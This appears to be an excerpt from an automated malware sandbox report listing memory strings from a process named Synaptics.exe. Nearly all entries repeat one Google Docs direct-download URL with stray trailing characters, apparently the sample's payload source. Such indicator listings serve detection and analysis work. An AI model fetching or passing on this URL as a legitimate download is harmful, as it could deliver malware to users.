                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:T
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:d
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:m
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:v
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;-
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;P
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;p
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=a
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=u
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?Q
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?U
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?f
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAP
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB7
                              Source: Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB=
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBL
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBSB
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBT
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBd
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBvW
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCS
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCc
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCpF
                              Source: Synaptics.exe, 00000003.00000002.2006759588.000000000D37E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDC
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDW
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenetleniyor...
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDeneto
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEPj
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEg
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEuT
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF0
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFM
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFb
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFl
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFwA
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGUe
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGV
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGf
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH/X
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHrC
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHtY
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIQ
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIa
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ1
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJM
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJN
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJT
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJe
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJmZ
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJw_
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK.E
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKP
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKq
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLNCRI
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLP
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadML
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMT
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMaP
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMd
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMv
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN-B
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN2
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNDy
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNc
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNpY
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOQ
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOW
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOg
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPC
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPR
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPb
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPw
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQN
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQU
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQd
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQf
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQg
                              Source: Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR/n
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR0
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRM
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRru
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRt
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSQ
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSa
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTM
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTT
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTU
